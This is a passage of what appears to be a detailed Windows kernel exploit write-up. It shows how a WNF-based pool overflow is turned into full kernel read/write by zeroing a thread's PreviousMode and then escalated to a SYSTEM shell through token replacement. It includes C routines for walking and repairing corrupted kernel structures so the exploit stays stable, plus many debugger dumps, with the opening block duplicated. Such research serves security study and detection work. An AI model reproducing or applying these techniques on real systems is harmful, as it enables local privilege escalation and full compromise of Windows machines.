    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this correct (and see we hit our breakpoint in the previous article):

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this correct (and see we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the `_KTHREAD` kernel data structure which is associated with our running exploit thread. 


At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE prior to the _KPROCESS ThreadListHead Flink we can leak out the value by confusing it with the DataSize and the ChangeTimestamp, we can then calculate the FLINK as “FLINK = (uintptr_t)ChangeTimestamp << 32 | DataSize` after querying the object.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.

Once we have the address of the _KTHREAD we need to again find a sane value to confuse with the AllocatedSize and DataSize to allow reading and writing of PreviousMode value at offset 0x232.

In this case, pointing it into here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  &quot;???&quot;

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
+ 0x000 Header           : _WNF_NODE_HEADER
+ 0x004 AllocatedSize : 0xffff900f
+ 0x008 DataSize : 3
+ 0x00c ChangeStamp : 0

Allowing the most significant word of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence this value used for DataSize using SetProcessAffinityMask or launching the process with start /affinity exploit.exe but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3 byte read (and up to 0xffff900f bytes write if needed – but we only need 3 bytes), of which the PreviousMode is included (i.e set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant word of the pointer with it always being a kernel mode address, should ensure that this is a sufficient AllocatedSize to enable overwriting PreviousMode.

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this now gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates how moving from an awkward to use arbitrary read/write to a better method which enables easier post exploitation and enhanced clean up options.

It is then trivial to walk the ActiveProcessLinks within the EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES for the existing token using techniques which have been long used by Windows exploits.

Kernel Memory Cleanup

OK, so the above is good enough for a proof of concept exploit but due to the potentially large amount of memory writes needing to occur for exploit success, then it could leave the kernel in a bad state. Also, when the process terminates then certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof of concept exploit writers but is often the most challenging for use in real world scenario’s (red teams / simulated attacks etc) where stability and reliability are important. Going through this process also helps understand how these types of attacks can also be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM but PreviousMode is still set to 0. Then we end up with the following crash:

```
Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
```

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory APIs to restore the PreviousMode value to 1 before launching the cmd.exe shell.

StateData Pointer Restoration

The _WNF_STATE_DATA StateData pointer is free’d when the _WNF_NAME_INSTANCE is freed on process termination (incidentially also an arbitrary free). If this is not restored to the original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

Although we could restore this using the WNF relative read/write, as we have arbitrary read and write using the APIs, we can implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object address.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}

Then once we have obtained our _WNF_NAME_INSTANCE we can then restore the original StateData pointer.

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted many RunRef from _WNF_NAME_INSTANCE‘s in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see there is a member TemporaryNamesListHead which is a linked list of the addresses of the TemporaryNamesListHead within the _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I had the need to obtain NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, then the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14

Exploit Testing and Statistics

As there are some elements of instability and non-deterministic elements of this exploit, then an exploit testing framework was developed to determine the effectiveness across multiple runs and on multiple different supported platforms and by varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third party drivers etc installed and a more noisy kernel pool, it gives some indication of this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

